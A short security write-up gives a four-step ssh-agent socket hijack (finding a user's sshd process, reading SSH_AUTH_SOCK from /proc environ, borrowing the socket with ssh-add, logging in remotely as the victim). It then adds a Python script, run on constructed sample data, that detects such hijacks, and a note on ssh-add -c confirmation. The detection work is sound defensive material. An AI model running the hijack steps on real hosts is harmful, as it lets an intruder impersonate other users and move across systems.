Step 1: We first determine the SSH process ID of the user on the compromised host:
ps aux |grep sshd
Step 2: Determine the SSH_AUTH_SOCK environment variable for the sshd PID:
grep SSH_AUTH_SOCK /proc/<PID>/environ
Step 3: We then hijack the target's ssh-agent socket:
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXX/agent.XXXX ssh-add -l
Step 4: Finally, we log into the remote system our victim is logged into as the target:
ssh remotesystem -l victim
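The procedure above leaves a visible footprint: a process (typically running as root) whose SSH_AUTH_SOCK points at an agent socket owned by a different uid. The following detection script is an added example, not part of the original write-up; the process table and socket owner map are constructed sample data, and collect_live() is a hypothetical helper for gathering the same tuples from /proc on a real host.

```python
"""Flag processes talking to an ssh-agent socket owned by another uid."""
import os

# Constructed sample data, shaped like /proc: (pid, uid, comm, environ bytes).
SAMPLE_PROCS = [
    (2101, 1001, "bash", b"USER=victim\x00SSH_AUTH_SOCK=/tmp/ssh-abc123/agent.2099\x00"),
    (2300, 1001, "ssh", b"SSH_AUTH_SOCK=/tmp/ssh-abc123/agent.2099\x00TERM=xterm\x00"),
    (4711, 0, "ssh", b"SSH_AUTH_SOCK=/tmp/ssh-abc123/agent.2099\x00HOME=/root\x00"),
    (4712, 0, "ssh-add", b"SSH_AUTH_SOCK=/tmp/ssh-abc123/agent.2099\x00"),
    (5000, 1002, "bash", b"SSH_AUTH_SOCK=/run/user/1002/keyring/ssh\x00"),
]
# Constructed owner map: socket path -> uid that owns the socket file.
SAMPLE_OWNERS = {"/tmp/ssh-abc123/agent.2099": 1001, "/run/user/1002/keyring/ssh": 1002}


def agent_socket(environ):
    """Return SSH_AUTH_SOCK from a NUL-separated /proc/<pid>/environ blob, or None."""
    for entry in environ.split(b"\x00"):
        if entry.startswith(b"SSH_AUTH_SOCK="):
            return entry.split(b"=", 1)[1].decode(errors="replace")
    return None


def find_hijacks(procs, owners):
    """Processes whose agent socket belongs to a different uid: the footprint
    of a shell that exported another session's SSH_AUTH_SOCK."""
    hits = []
    for pid, uid, comm, environ in procs:
        sock = agent_socket(environ)
        if sock in owners and owners[sock] != uid:
            hits.append((pid, uid, comm, sock, owners[sock]))
    return hits


def collect_live():
    """Gather the same tuples from a running host (reading environ needs root)."""
    procs, owners = [], {}
    for d in filter(str.isdigit, os.listdir("/proc")):
        try:
            uid = os.stat(f"/proc/{d}").st_uid
            comm = open(f"/proc/{d}/comm").read().strip()
            environ = open(f"/proc/{d}/environ", "rb").read()
        except OSError:
            continue  # process exited or is unreadable
        sock = agent_socket(environ)
        if sock and sock not in owners and os.path.exists(sock):
            owners[sock] = os.stat(sock).st_uid
        procs.append((int(d), uid, comm, environ))
    return procs, owners
```

Keys added with `ssh-add -c` additionally require the socket owner to confirm each signature request, so borrowed use of the agent is visible to the victim as well as to this check.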